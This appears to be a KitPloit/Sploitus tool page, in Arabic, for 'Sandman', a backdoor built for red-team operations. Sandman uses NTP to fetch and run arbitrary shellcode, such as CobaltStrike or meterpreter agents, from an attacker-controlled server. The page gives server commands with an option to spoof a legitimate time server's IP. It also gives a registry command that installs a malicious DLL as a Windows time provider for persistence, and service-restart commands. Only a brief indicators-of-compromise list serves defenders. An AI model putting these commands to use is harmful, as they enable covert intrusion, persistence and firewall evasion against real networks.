## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IDOV31-SANDMAN
# ساندمان
  
ساندمان هو باب خلفي مصمم للعمل على الشبكات المحصنة أثناء عمليات الفريق الأحمر.
يعمل ساندمان كمرحّل ويستفيد من NTP (بروتوكول مزامنة الوقت والتاريخ) لجلب وتنفيذ **شيلكود** عشوائي من خادم مُحدد مسبقًا.
بما أن NTP هو بروتوكول يتم تجاهله من قبل العديد من المدافعين، مما يؤدي إلى سهولة الوصول إلى الشبكة.
## الاستخدام

### خادم ساندمان (الاستخدام)
يعمل على ويندوز / أنظمة يونكس:
root@kitploit:~
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
* محول الشبكة: المحول الذي تريد أن يستمع عليه الخادم (مثال: Ethernet لويندوز، eth0 ليونكس).
* رابط الحمولة: الرابط إلى الشيلكود الخاص بك، قد يكون وكيلك (مثال: CobaltStrike أو meterpreter) أو مرحّل آخر.
* العنوان IP للتزوير: إذا كنت ترغب في تزوير عنوان IP شرعي (مثال: عنوان time.microsoft.com).
### الباب الخلفي لساندمان (الاستخدام)
للبدء، يمكنك ترجمة الباب الخلفي لساندمان كما هو مذكور أدناه، لأنه ملف تنفيذي خفيف بلغة C# يمكنك تشغيله عبر ExecuteAssembly، أو تشغيله كموفر NTP، أو مجرد تنفيذه/حقنه.
### موفر وقت الباب الخلفي لساندمان (الاستخدام)
لاستخدامه، ستحتاج إلى اتباع خطوات بسيطة:
* أضف قيمة التسجيل التالية:
root@kitploit:~
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
* أعد تشغيل خدمة w32time:
root@kitploit:~
sc stop w32time
sc start w32time
**ملاحظة: تأكد من أنك تترجم باستخدام خيار x64 وليس أي خيار CPU!**
## القدرات
* جلب وتنفيذ حمولة عشوائية من خادم يتحكم به المهاجم.
* يمكن العمل على الشبكات المحصنة لأن NTP عادةً ما يكون مسموحًا به في جدار الحماية.
* انتحال شخصية خادم NTP شرعي عبر تزوير IP.
## الإعداد
### خادم ساندمان (الإعداد)
* بايثون 3.9
* المتطلبات محددة في ملف requirements.
### الباب الخلفي لساندمان (الإعداد)
لتجميع الباب الخلفي، استخدمت Visual Studio 2022، ولكن كما هو مذكور في قسم الاستخدام، يمكن تجميعه باستخدام كل من VS2022 و CSC. يمكنك تجميعه إما باستخدام USE_SHELLCODE واستخدام شيلكود Orca أو بدون USE_SHELLCODE لاستخدام WebClient.
### موفر وقت الباب الخلفي لساندمان (الإعداد)
لتجميع الباب الخلفي، استخدمت Visual Studio 2022، ستحتاج أيضًا إلى تثبيت DllExport (عبر Nuget أو أي طريقة أخرى) لتجميعه. يمكنك تجميعه إما باستخدام USE_SHELLCODE واستخدام شيلكود Orca أو بدون USE_SHELLCODE لاستخدام WebClient.
## مؤشرات الاختراق (IOCs)
* يتم حقن شيلكود في RuntimeBroker.
* يبدأ اتصال NTP المشبوه برأس سحري معروف.
* قاعدة YARA.
## المساهمون
* Orca للشيلكود.
* شكر خاص لـ Tim McGuffin على فكرة موفر الوقت.
شكرًا لمن ساهم بالفعل وسأقبل المساهمات بكل سرور، قم بعمل طلب سحب وسأراجعه!